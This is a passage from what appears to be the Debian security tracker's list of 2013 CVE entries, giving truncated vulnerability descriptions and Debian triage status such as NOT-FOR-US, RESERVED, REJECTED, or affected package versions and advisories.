NOT-FOR-US: Adobe ColdFusion CVE-2013-3348 (Adobe Shockwave Player before 12.0.3.133 allows attackers to execute a ...) NOT-FOR-US: Adobe Shockwave Player CVE-2013-3347 (Integer overflow in Adobe Flash Player before 11.7.700.232 and 11.8.x ...) NOT-FOR-US: Adobe Flash Player CVE-2013-3346 (Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and 11. ...) NOT-FOR-US: Adobe Reader CVE-2013-3345 (Adobe Flash Player before 11.7.700.232 and 11.8.x before 11.8.800.94 o ...) NOT-FOR-US: Adobe Flash Player CVE-2013-3344 (Heap-based buffer overflow in Adobe Flash Player before 11.7.700.232 a ...) NOT-FOR-US: Adobe Flash Player CVE-2013-3343 (Adobe Flash Player before 10.3.183.90 and 11.x before 11.7.700.224 on ...) NOT-FOR-US: Adobe Flash Player CVE-2013-3342 (Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and 11. ...) NOT-FOR-US: Adobe Reader CVE-2013-3341 (Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and 11. ...) NOT-FOR-US: Adobe Reader CVE-2013-3340 (Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and 11. ...) NOT-FOR-US: Adobe Reader CVE-2013-3339 (Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and 11. ...) NOT-FOR-US: Adobe Reader CVE-2013-3338 (Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and 11. ...) NOT-FOR-US: Adobe Reader CVE-2013-3337 (Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and 11. ...) NOT-FOR-US: Adobe Reader CVE-2013-3336 (Unspecified vulnerability in Adobe ColdFusion 9.0, 9.0.1, 9.0.2, and 1 ...) NOT-FOR-US: Adobe ColdFusion CVE-2013-3335 (Adobe Flash Player before 10.3.183.86 and 11.x before 11.7.700.202 on ...) NOT-FOR-US: Adobe Flash Player CVE-2013-3334 (Adobe Flash Player before 10.3.183.86 and 11.x before 11.7.700.202 on ...) NOT-FOR-US: Adobe Flash Player CVE-2013-3333 (Adobe Flash Player before 10.3.183.86 and 11.x before 11.7.700.202 on ...) NOT-FOR-US: Adobe Flash Player CVE-2013-3332 (Adobe Flash Player before 10.3.183.86 and 11.x before 11.7.700.202 on ...) NOT-FOR-US: Adobe Flash Player CVE-2013-3331 (Adobe Flash Player before 10.3.183.86 and 11.x before 11.7.700.202 on ...) NOT-FOR-US: Adobe Flash Player CVE-2013-3330 (Adobe Flash Player before 10.3.183.86 and 11.x before 11.7.700.202 on ...) NOT-FOR-US: Adobe Flash Player CVE-2013-3329 (Adobe Flash Player before 10.3.183.86 and 11.x before 11.7.700.202 on ...) NOT-FOR-US: Adobe Flash Player CVE-2013-3328 (Adobe Flash Player before 10.3.183.86 and 11.x before 11.7.700.202 on ...) NOT-FOR-US: Adobe Flash Player CVE-2013-3327 (Adobe Flash Player before 10.3.183.86 and 11.x before 11.7.700.202 on ...) NOT-FOR-US: Adobe Flash Player CVE-2013-3326 (Adobe Flash Player before 10.3.183.86 and 11.x before 11.7.700.202 on ...) NOT-FOR-US: Adobe Flash Player CVE-2013-3325 (Adobe Flash Player before 10.3.183.86 and 11.x before 11.7.700.202 on ...) NOT-FOR-US: Adobe Flash Player CVE-2013-3324 (Adobe Flash Player before 10.3.183.86 and 11.x before 11.7.700.202 on ...) NOT-FOR-US: Adobe Flash Player CVE-2013-3323 (A Privilege Escalation Vulnerability exists in IBM Maximo Asset Manage ...) NOT-FOR-US: IBM CVE-2013-3322 (NetApp OnCommand System Manager 2.1 and earlier allows remote attacker ...) NOT-FOR-US: NetApp OnCommand System Manager CVE-2013-3321 (NetApp OnCommand System Manager 2.1 and earlier allows remote attacker ...) NOT-FOR-US: NetApp CVE-2013-3320 (Cross-site Scripting (XSS) vulnerability in NetApp OnCommand System Ma ...) NOT-FOR-US: NetApp CVE-2013-3319 (The GetComputerSystem method in the HostControl service in SAP Netweav ...) NOT-FOR-US: SAP Netweaver CVE-2013-3318 REJECTED CVE-2013-3317 (Netgear WNR1000v3 with firmware before 1.0.2.60 contains an Authentica ...) NOT-FOR-US: Netgear CVE-2013-3316 (Netgear WNR1000v3 with firmware before 1.0.2.60 contains an Authentica ...) NOT-FOR-US: Netgear CVE-2013-3315 (The server in TIBCO Silver Mobile 1.1.0 does not properly verify acces ...) NOT-FOR-US: TIBCO CVE-2013-3314 (The Loftek Nexus 543 IP Camera allows remote attackers to obtain (1) I ...) NOT-FOR-US: Loftek Nexus 543 IP Camera CVE-2013-3313 (The Loftek Nexus 543 IP Camera stores passwords in cleartext, which al ...) NOT-FOR-US: Loftek Nexus 543 IP Camera CVE-2013-3312 (Multiple cross-site request forgery (CSRF) vulnerabilities in the Loft ...) NOT-FOR-US: Loftek Nexus 543 IP Camera CVE-2013-3311 (Directory traversal vulnerability in the Loftek Nexus 543 IP Camera al ...) NOT-FOR-US: Loftek Nexus 543 IP Camera CVE-2013-3310 RESERVED CVE-2013-3309 RESERVED CVE-2013-3308 RESERVED CVE-2013-3307 RESERVED CVE-2013-3306 RESERVED CVE-2013-3305 RESERVED CVE-2013-3304 (Directory traversal vulnerability in Dell EqualLogic PS4000 with firmw ...) NOT-FOR-US: Dell EqualLogic PS4000 CVE-2013-3303 RESERVED CVE-2013-3300 (The JsonParser class in json/JsonParser.scala in Lift before 2.5 inter ...) NOT-FOR-US: Lift Framework CVE-2013-3299 (RealNetworks RealPlayer 16.0.2.32 and earlier allows remote attackers ...) NOT-FOR-US: RealPlayer CVE-2013-3298 RESERVED CVE-2013-3297 RESERVED CVE-2013-3296 RESERVED CVE-2013-3295 (Directory traversal vulnerability in install/popup.php in Exponent CMS ...) NOT-FOR-US: Exponent CMS CVE-2013-3294 (Multiple SQL injection vulnerabilities in Exponent CMS before 2.2.0 re ...) NOT-FOR-US: Exponent CMS CVE-2013-3293 RESERVED CVE-2013-3292 RESERVED CVE-2013-3291 RESERVED CVE-2013-3290 RESERVED CVE-2013-3289 REJECTED CVE-2013-3288 (Cross-site scripting (XSS) vulnerability on the EMC RSA Data Protectio ...) NOT-FOR-US: EMC CVE-2013-3287 (EMC Unisphere for VMAX before 1.6.1.6, when using an unspecified level ...) NOT-FOR-US: EMC Unisphere for VMAX CVE-2013-3286 (Multiple cross-site scripting (XSS) vulnerabilities in EMC Documentum ...) NOT-FOR-US: EMC Documentum CVE-2013-3285 (The NetWorker Management Console (NMC) in EMC NetWorker 8.0.x before 8 ...) NOT-FOR-US: EMC NetWorker CVE-2013-3284 REJECTED CVE-2013-3283 REJECTED CVE-2013-3282 REJECTED CVE-2013-3281 (Cross-site scripting (XSS) vulnerability in EMC Documentum Webtop befo ...) NOT-FOR-US: EMC Documentum CVE-2013-3280 (EMC RSA Authentication Agent 7.1.x before 7.1.2 for Web for Internet I ...) NOT-FOR-US: RSA Authentication Agent for Web for Internet Information Services CVE-2013-3279 (EMC Atmos before 2.1.4 has a blank password for the PostgreSQL account ...) NOT-FOR-US: EMC CVE-2013-3278 (EMC VPLEX before VPLEX GeoSynchrony 5.2 SP1 uses cleartext for storage ...) NOT-FOR-US: EMC CVE-2013-3277 (Open redirect vulnerability in EMC RSA Archer GRC 5.x before 5.4 allow ...) NOT-FOR-US: EMC CVE-2013-3276 (EMC RSA Archer GRC 5.x before 5.4 allows remote authenticated users to ...) NOT-FOR-US: EMC CVE-2013-3275 (EMC Avamar Server and Avamar Virtual Edition before 7.0 on Data Store ...) NOT-FOR-US: EMC CVE-2013-3274 (EMC Avamar Server and Avamar Virtual Edition before 7.0 on Data Store ...) NOT-FOR-US: EMC CVE-2013-3273 (EMC RSA Authentication Manager 8.0 before P2 and 7.1 before SP4 P26, a ...) NOT-FOR-US: EMC CVE-2013-3272 (EMC Replication Manager (RM) before 5.4.4 places encoded passwords in ...) NOT-FOR-US: EMC CVE-2013-3271 (EMC RSA Authentication Agent for PAM 7.0 before 7.0.2.1 enforces the m ...) NOT-FOR-US: EMC CVE-2013-3270 (EMC VNX Control Station before 7.1.70.2 and Celerra Control Station be ...) NOT-FOR-US: EMC CVE-2013-3302 (Race condition in the smb_send_rqst function in fs/cifs/transport.c in ...) - linux-2.6 (Introduced in 3.7) - linux 3.8-1 [wheezy] - linux (Introduced in 3.7) CVE-2013-3301 (The ftrace implementation in the Linux kernel before 3.8.8 allows loca ...) {DSA-2669-1} - linux-2.6 (Vulnerable code not present) - linux 3.8.11-1 (low) NOTE: https://git.kernel.org/linus/6a76f8c0ab19f215af2a3442870eeb5f0e81998d NOTE: Not enabled in default kernels CVE-2013-3269 (Cross-site request forgery (CSRF) vulnerability in Cybozu Office befor ...) NOT-FOR-US: Cybozu Office CVE-2013-3268 (Novell iManager 2.7 before SP6 Patch 1 does not refresh a token after ...) NOT-FOR-US: Novell iManager CVE-2013-3267 (Cross-site scripting (XSS) vulnerability in the highlighter plugin in ...) NOT-FOR-US: Joomla! CVE-2013-3266 (The nfsrvd_readdir function in sys/fs/nfsserver/nfs_nfsdport.c in the ...) {DSA-2672-1} - kfreebsd-9 9.0-11 (bug #706414) - kfreebsd-8 (bug #706418) [wheezy] - kfreebsd-8 (new NFS server is not enabled) [squeeze] - kfreebsd-8 (new NFS server is not enabled) NOTE: http://www.freebsd.org/security/advisories/FreeBSD-SA-13:05.nfsserver.asc CVE-2013-3265 RESERVED CVE-2013-3264 (The WP Ultimate Email Marketer plugin 1.1.0 and possibly earlier for W ...) NOT-FOR-US: WP Ultimate Email Marketer CVE-2013-3263 (Multiple cross-site scripting (XSS) vulnerabilities in the WP Ultimate ...) NOT-FOR-US: WP Ultimate Email Marketer CVE-2013-3262 (Cross-site scripting (XSS) vulnerability in admin/admin.php in the Dow ...) NOT-FOR-US: WordPress plugin download-monitor CVE-2013-3261 (Cross-site scripting (XSS) vulnerability in wp-admin/admin.php in the ...) NOT-FOR-US: WordPress plugin flash-album-gallery CVE-2013-3260 (Heap-based buffer overflow in INMATRIX Zoom Player before 8.7 beta 11 ...) NOT-FOR-US: INMATRIX Zoom Player CVE-2013-3259 (Stack-based buffer overflow in INMATRIX Zoom Player before 8.7 beta 11 ...) NOT-FOR-US: INMATRIX Zoom Player CVE-2013-3258 (Cross-site request forgery (CSRF) vulnerability in he Digg Digg plugin ...) NOT-FOR-US: WordPress plugin digg-digg CVE-2013-3257 (Cross-site request forgery (CSRF) vulnerability in the Related Posts p ...) NOT-FOR-US: WordPress plugin related-posts CVE-2013-3256 (Cross-site request forgery (CSRF) vulnerability in the Shareaholic Sex ...) NOT-FOR-US: WordPress plugin sexybookmarks CVE-2013-3255 RESERVED CVE-2013-3254 (Cross-site scripting (XSS) vulnerability in wp-admin/admin.php in the ...) NOT-FOR-US: WordPress plugin CVE-2013-3253 (Cross-site request forgery (CSRF) vulnerability in admin/setting.php i ...) NOT-FOR-US: WordPress plugin CVE-2013-3252 (Cross-site request forgery (CSRF) vulnerability in the options admin p ...) NOT-FOR-US: WordPress plugin WP-PostViews CVE-2013-3251 (Cross-site request forgery (CSRF) vulnerability in the qTranslate plug ...) NOT-FOR-US: WordPress plugin qTranslate CVE-2013-3250 (Cross-site request forgery (CSRF) vulnerability in the WP Maintenance ...) NOT-FOR-US: WP Maintenance Mode plugin for Wordpress CVE-2013-3249 (Stack-based buffer overflow in the "Add from text file" feature in the ...) NOT-FOR-US: DameWare Remote Support CVE-2013-3248 (Untrusted search path vulnerability in Corel PDF Fusion 1.11 allows lo ...) NOT-FOR-US: Corel PDF Fusion CVE-2013-3247 (Heap-based buffer overflow in xnview.exe in XnView before 2.03 allows ...) NOT-FOR-US: XnView CVE-2013-3246 (Stack-based buffer overflow in xnview.exe in XnView before 2.03 allows ...) NOT-FOR-US: XnView CVE-2013-3245 (** DISPUTED ** plugins/demux/libmkv_plugin.dll in VideoLAN VLC Media P ...) - vlc 2.0.7-1 (unimportant) NOTE: Harmless crasher NOTE: http://git.videolan.org/?p=vlc.git;a=commit;h=59c9e8309d5b435a2d85c2c9eaae979ba56ccdd9 NOTE: http://secunia.com/blog/372/ NOTE: http://www.jbkempf.com/blog/post/2013/More-lies-from-Secunia CVE-2013-3244 (Multiple unspecified vulnerabilities in the CJDB_FILL_MEMORY_FROM_PPB ...) NOT-FOR-US: SAP ERP Central Component CVE-2013-3243 (Unspecified vulnerability in OpenText/IXOS ECM for SAP NetWeaver allow ...) NOT-FOR-US: SAP NetWeaver CVE-2013-3242 (plugins/system/remember/remember.php in Joomla! 2.5.x before 2.5.10 an ...) NOT-FOR-US: Joomla! CVE-2013-3241 (export.php (aka the export script) in phpMyAdmin 4.x before 4.0.0-rc3 ...) - phpmyadmin (Vulnerable code not present) CVE-2013-3240 (Directory traversal vulnerability in the Export feature in phpMyAdmin ...) - phpmyadmin (Vulnerable code not present) CVE-2013-3239 (phpMyAdmin 3.5.x before 3.5.8 and 4.x before 4.0.0-rc3, when a SaveDir ...) {DLA-0014-1} - phpmyadmin 4:3.4.11.1-2 [squeeze] - phpmyadmin 4:3.3.7-8 NOTE: Requires non-default option saveDir to be enabled, an authenticated untrusted user and Apache mod_mime CVE-2013-3238 (phpMyAdmin 3.5.x before 3.5.8 and 4.x before 4.0.0-rc3 allows remote a ...) - phpmyadmin (exploitable PHP on Windows only) NOTE: code patched in 4:3.4.11.1-2 nonetheless CVE-2013-3237 (The vsock_stream_sendmsg function in net/vmw_vsock/af_vsock.c in the L ...) - linux-2.6 ((net/vmw_vsock/af_vsock.c not present) - linux (net/vmw_vsock/af_vsock.c not present) - open-vm-tools 2:9.2.2-893683-8 (low; bug #706557) [wheezy] - open-vm-tools (Minor information leak) [squeeze] - open-vm-tools (Contrib not supported, minor information leak) CVE-2013-3236 (The vmci_transport_dgram_dequeue function in net/vmw_vsock/vmci_transp ...) - linux-2.6 (VM Sockets only introduced in 3.9-rc1) - linux (VM Sockets introduced in 3.9-rc1) CVE-2013-3235 (net/tipc/socket.c in the Linux kernel before 3.9-rc7 does not initiali ...) {DSA-2669-1 DSA-2668-1} - linux-2.6 (low) - linux 3.8.11-1 (low) CVE-2013-3234 (The rose_recvmsg function in net/rose/af_rose.c in the Linux kernel be ...) {DSA-2669-1 DSA-2668-1} - linux-2.6 (low) - linux 3.8.11-1 (low) CVE-2013-3233 (The llcp_sock_recvmsg function in net/nfc/llcp/sock.c in the Linux ker ...) - linux-2.6 (net/nfc/llcp/sock.c not present, introduced in 3.3) - linux (net/nfc/llcp/sock.c not present, introduced in 3.3) CVE-2013-3232 (The nr_recvmsg function in net/netrom/af_netrom.c in the Linux kernel ...) - linux-2.6 (Introduced and fixed during 3.9 cycle) - linux (Introduced and fixed during 3.9 cycle) CVE-2013-3231 (The llc_ui_recvmsg function in net/llc/af_llc.c in the Linux kernel be ...) {DSA-2669-1 DSA-2668-1} - linux-2.6 (low) - linux 3.8.11-1 (low) CVE-2013-3230 (The l2tp_ip6_recvmsg function in net/l2tp/l2tp_ip6.c in the Linux kern ...) - linux-2.6 (net/l2tp/l2tp_ip6.c not present) - linux (net/l2tp/l2tp_ip6.c introduced in 3.5) CVE-2013-3229 (The iucv_sock_recvmsg function in net/iucv/af_iucv.c in the Linux kern ...) {DSA-2669-1 DSA-2668-1} - linux-2.6 (low) - linux 3.8.11-1 (low) CVE-2013-3228 (The irda_recvmsg_dgram function in net/irda/af_irda.c in the Linux ker ...) {DSA-2669-1 DSA-2668-1} - linux-2.6 (low) - linux 3.8.11-1 (low) CVE-2013-3227 (The caif_seqpkt_recvmsg function in net/caif/caif_socket.c in the Linu ...) {DSA-2669-1} - linux-2.6 (net/caif/caif_socket.c introduced in v2.6.35) - linux 3.8.11-1 (low) CVE-2013-3226 (The sco_sock_recvmsg function in net/bluetooth/sco.c in the Linux kern ...) - linux-2.6 (Vulnerable code not yet present) - linux (Vulnerable code not yet present) NOTE: sco_sock_recvmsg only introduced with v3.8, bt_sock_recvmsg has its own CVE ID CVE-2013-3225 (The rfcomm_sock_recvmsg function in net/bluetooth/rfcomm/sock.c in the ...) {DSA-2669-1 DSA-2668-1} - linux-2.6 (low) - linux 3.8.11-1 (low) CVE-2013-3224 (The bt_sock_recvmsg function in net/bluetooth/af_bluetooth.c in the Li ...) {DSA-2669-1 DSA-2668-1} - linux-2.6 (low) - linux 3.8.11-1 (low) CVE-2013-3223 (The ax25_recvmsg function in net/ax25/af_ax25.c in the Linux kernel be ...) {DSA-2669-1 DSA-2668-1} - linux-2.6 (low) - linux 3.8.11-1 (low) CVE-2013-3222 (The vcc_recvmsg function in net/atm/common.c in the Linux kernel befor ...) {DSA-2669-1 DSA-2668-1} - linux-2.6 (low) - linux 3.8.11-1 (low) CVE-2013-3221 (The Active Record component in Ruby on Rails 2.3.x, 3.0.x, 3.1.x, and ...) - rails-3.2 (unimportant) - ruby-activerecord-3.2 (unimportant) - ruby-activerecord-2.3 (unimportant) [wheezy] - ruby-activerecord-2.3 - rails 2.3.14.1 (unimportant) NOTE: Starting with 2.3.14.1 rails is a transition package NOTE: This is a general design problem and only mitigated by documented best practices CVE-2013-3220 (bitcoind and Bitcoin-Qt before 0.4.9rc2, 0.5.x before 0.5.8rc2, 0.6.x ...) - bitcoin 0.8.1-1 CVE-2013-3219 (bitcoind and Bitcoin-Qt 0.8.x before 0.8.1 do not enforce a certain bl ...) - bitcoin 0.8.1-1 CVE-2013-3218 RESERVED CVE-2013-3217 RESERVED CVE-2013-3216 RESERVED CVE-2013-3215 (vtiger CRM 5.4.0 and earlier contain an Authentication Bypass Vulnerab ...) NOT-FOR-US: vtiger CRM CVE-2013-3214 (vtiger CRM 5.4.0 and earlier contain a PHP Code Injection Vulnerabilit ...) NOT-FOR-US: vtiger CRM CVE-2013-3213 (Multiple SQL injection vulnerabilities in vTiger CRM 5.0.0 through 5.4 ...) NOT-FOR-US: vTiger CRM CVE-2013-3212 (vtiger CRM 5.4.0 and earlier contain local file-include vulnerabilitie ...) NOT-FOR-US: vtiger CRM CVE-2013-3211 (Unspecified vulnerability in Opera before 12.15 has unknown impact and ...) NOT-FOR-US: Opera CVE-2013-3210 (Opera before 12.15 does not properly block top-level domains in Set-Co ...) NOT-FOR-US: Opera CVE-2013-3209 (Microsoft Internet Explorer 9 and 10 allows remote attackers to execut ...) NOT-FOR-US: Microsoft CVE-2013-3208 (Microsoft Internet Explorer 8 through 10 allows remote attackers to ex ...) NOT-FOR-US: Microsoft CVE-2013-3207 (Microsoft Internet Explorer 9 and 10 allows remote attackers to execut ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-3206 (Microsoft Internet Explorer 9 and 10 allows remote attackers to execut ...) NOT-FOR-US: Microsoft CVE-2013-3205 (Microsoft Internet Explorer 6 through 8 allows remote attackers to exe ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-3204 (Microsoft Internet Explorer 7 through 10 allows remote attackers to ex ...) NOT-FOR-US: Microsoft CVE-2013-3203 (Microsoft Internet Explorer 9 and 10 allows remote attackers to execut ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-3202 (Microsoft Internet Explorer 10 allows remote attackers to execute arbi ...) NOT-FOR-US: Microsoft CVE-2013-3201 (Microsoft Internet Explorer 9 and 10 allows remote attackers to execut ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-3200 (The USB drivers in the kernel-mode drivers in Microsoft Windows XP SP2 ...) NOT-FOR-US: Microsoft Windows CVE-2013-3199 (Microsoft Internet Explorer 6 through 10 allows remote attackers to ex ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-3198 (The NT Virtual DOS Machine (NTVDM) subsystem in the kernel in Microsof ...) NOT-FOR-US: Microsoft Windows CVE-2013-3197 (The NT Virtual DOS Machine (NTVDM) subsystem in the kernel in Microsof ...) NOT-FOR-US: Microsoft Windows CVE-2013-3196 (The NT Virtual DOS Machine (NTVDM) subsystem in the kernel in Microsof ...) NOT-FOR-US: Microsoft Windows CVE-2013-3195 (The DSA_InsertItem function in Comctl32.dll in the Windows common cont ...) NOT-FOR-US: Microsoft Windows CVE-2013-3194 (Microsoft Internet Explorer 9 allows remote attackers to execute arbit ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-3193 (Microsoft Internet Explorer 9 and 10 allows remote attackers to execut ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-3192 (Cross-site scripting (XSS) vulnerability in Microsoft Internet Explore ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-3191 (Microsoft Internet Explorer 9 and 10 allows remote attackers to execut ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-3190 (Microsoft Internet Explorer 8 through 10 allows remote attackers to ex ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-3189 (Microsoft Internet Explorer 8 and 9 allows remote attackers to execute ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-3188 (Microsoft Internet Explorer 8 and 9 allows remote attackers to execute ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-3187 (Microsoft Internet Explorer 9 and 10 allows remote attackers to execut ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-3186 (The Protected Mode feature in Microsoft Internet Explorer 7 through 10 ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-3185 (Microsoft Active Directory Federation Services (AD FS) 1.x through 2.1 ...) NOT-FOR-US: Microsoft Active Directory Federation Services CVE-2013-3184 (Microsoft Internet Explorer 7 through 10 allows remote attackers to ex ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-3183 (The TCP/IP implementation in Microsoft Windows Vista SP2, Windows Serv ...) NOT-FOR-US: Microsoft Windows CVE-2013-3182 (The Windows NAT Driver (aka winnat) service in Microsoft Windows Serve ...) NOT-FOR-US: Microsoft Windows CVE-2013-3181 (usp10.dll in the Unicode Scripts Processor in Microsoft Windows XP SP2 ...) NOT-FOR-US: Microsoft Windows CVE-2013-3180 (Cross-site scripting (XSS) vulnerability in Microsoft SharePoint Serve ...) NOT-FOR-US: Microsoft SharePoint Server CVE-2013-3179 (Cross-site scripting (XSS) vulnerability in Microsoft SharePoint Serve ...) NOT-FOR-US: Microsoft SharePoint Server CVE-2013-3178 (Microsoft Silverlight 5 before 5.1.20513.0 does not properly initializ ...) NOT-FOR-US: Microsoft Silverlight CVE-2013-3177 REJECTED CVE-2013-3176 REJECTED CVE-2013-3175 (Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vis ...) NOT-FOR-US: Microsoft CVE-2013-3174 (DirectShow in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP ...) NOT-FOR-US: Microsoft CVE-2013-3173 (Buffer overflow in win32k.sys in the kernel-mode drivers in Microsoft ...) NOT-FOR-US: Microsoft CVE-2013-3172 (Buffer overflow in win32k.sys in the kernel-mode drivers in Microsoft ...) NOT-FOR-US: Microsoft CVE-2013-3171 (The serialization functionality in Microsoft .NET Framework 2.0 SP2, 3 ...) NOT-FOR-US: Microsoft CVE-2013-3170 REJECTED CVE-2013-3169 REJECTED CVE-2013-3168 REJECTED CVE-2013-3167 (win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and ...) NOT-FOR-US: Microsoft CVE-2013-3166 (Cross-site scripting (XSS) vulnerability in Microsoft Internet Explore ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-3165 REJECTED CVE-2013-3164 (Microsoft Internet Explorer 8 allows remote attackers to execute arbit ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-3163 (Microsoft Internet Explorer 8 through 10 allows remote attackers to ex ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-3162 (Microsoft Internet Explorer 7 through 10 allows remote attackers to ex ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-3161 (Microsoft Internet Explorer 9 and 10 allows remote attackers to execut ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-3160 (Microsoft Office 2003 SP3 and 2007 SP3, Word 2003 SP3 and 2007 SP3, an ...) NOT-FOR-US: Microsoft Office CVE-2013-3159 (Microsoft Excel 2003 SP3, 2007 SP3, and 2010 SP1 and SP2; Excel Viewer ...) NOT-FOR-US: Microsoft Excel CVE-2013-3158 (Microsoft Excel 2003 SP3 and 2007 SP3 allows remote attackers to execu ...) NOT-FOR-US: Microsoft Excel CVE-2013-3157 (Microsoft Access 2007 SP3, 2010 SP1 and SP2, and 2013 in Microsoft Off ...) NOT-FOR-US: Microsoft CVE-2013-3156 (Microsoft Access 2007 SP3, 2010 SP1 and SP2, and 2013 in Microsoft Off ...) NOT-FOR-US: Microsoft Access CVE-2013-3155 (Microsoft Access 2007 SP3, 2010 SP1 and SP2, and 2013 in Microsoft Off ...) NOT-FOR-US: Microsoft CVE-2013-3154 (The signature-update functionality in Windows Defender on Microsoft Wi ...) NOT-FOR-US: Microsoft Windows CVE-2013-3153 (Microsoft Internet Explorer 6 through 10 allows remote attackers to ex ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-3152 (Microsoft Internet Explorer 10 allows remote attackers to execute arbi ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-3151 (Microsoft Internet Explorer 8 through 10 allows remote attackers to ex ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-3150 (Microsoft Internet Explorer 9 allows remote attackers to execute arbit ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-3149 (Microsoft Internet Explorer 7 and 8 allows remote attackers to execute ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-3148 (Microsoft Internet Explorer 6 through 10 allows remote attackers to ex ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-3147 (Microsoft Internet Explorer 6 through 9 allows remote attackers to exe ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-3146 (Microsoft Internet Explorer 10 allows remote attackers to execute arbi ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-3145 (Microsoft Internet Explorer 9 allows remote attackers to execute arbit ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-3144 (Microsoft Internet Explorer 8 through 10 allows remote attackers to ex ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-3143 (Microsoft Internet Explorer 9 and 10 allows remote attackers to execut ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-3142 (Microsoft Internet Explorer 6 through 10 allows remote attackers to ex ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-3141 (Microsoft Internet Explorer 8 and 9 allows remote attackers to execute ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-3140 (Use-after-free vulnerability in Microsoft Internet Explorer 9 allows r ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-3139 (Microsoft Internet Explorer 6 through 10 allows remote attackers to ex ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-3138 (Integer overflow in the TCP/IP kernel-mode driver in Microsoft Windows ...) NOT-FOR-US: Microsoft CVE-2013-3137 (Microsoft FrontPage 2003 SP3 does not properly parse DTDs, which allow ...) NOT-FOR-US: Microsoft FrontPage CVE-2013-3136 (The kernel in Microsoft Windows XP SP3, Windows Server 2003 SP2, Windo ...) NOT-FOR-US: Microsoft CVE-2013-3135 REJECTED CVE-2013-3134 (The Common Language Runtime (CLR) in Microsoft .NET Framework 2.0 SP2, ...) NOT-FOR-US: Microsoft .NET Framework CVE-2013-3133 (Microsoft .NET Framework 2.0 SP2, 3.5, 3.5.1, 4, and 4.5 does not prop ...) NOT-FOR-US: Microsoft .NET Framework CVE-2013-3132 (Microsoft .NET Framework 1.0 SP3, 1.1 SP1, 2.0 SP2, 3.5, 3.5.1, 4, and ...) NOT-FOR-US: Microsoft .NET Framework CVE-2013-3131 (Microsoft .NET Framework 2.0 SP2, 3.5, 3.5.1, 4, and 4.5, and Silverli ...) NOT-FOR-US: Microsoft CVE-2013-3130 REJECTED CVE-2013-3129 (Microsoft .NET Framework 3.0 SP2, 3.5, 3.5.1, 4, and 4.5; Silverlight ...) NOT-FOR-US: Microsoft CVE-2013-3128 (The kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows S ...) NOT-FOR-US: Microsoft Windows CVE-2013-3127 (The Microsoft WMV video codec in wmv9vcm.dll, wmvdmod.dll in Windows M ...) NOT-FOR-US: Microsoft CVE-2013-3126 (Microsoft Internet Explorer 9 and 10, when script debugging is enabled ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-3125 (Microsoft Internet Explorer 10 allows remote attackers to execute arbi ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-3124 (Microsoft Internet Explorer 9 allows remote attackers to execute arbit ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-3123 (Microsoft Internet Explorer 8 through 10 allows remote attackers to ex ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-3122 (Microsoft Internet Explorer 9 allows remote attackers to execute arbit ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-3121 (Microsoft Internet Explorer 6 through 10 allows remote attackers to ex ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-3120 (Microsoft Internet Explorer 10 allows remote attackers to execute arbi ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-3119 (Microsoft Internet Explorer 9 and 10 allows remote attackers to execut ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-3118 (Microsoft Internet Explorer 10 allows remote attackers to execute arbi ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-3117 (Microsoft Internet Explorer 9 allows remote attackers to execute arbit ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-3116 (Microsoft Internet Explorer 7 through 9 allows remote attackers to exe ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-3115 (Microsoft Internet Explorer 7 through 10 allows remote attackers to ex ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-3114 (Microsoft Internet 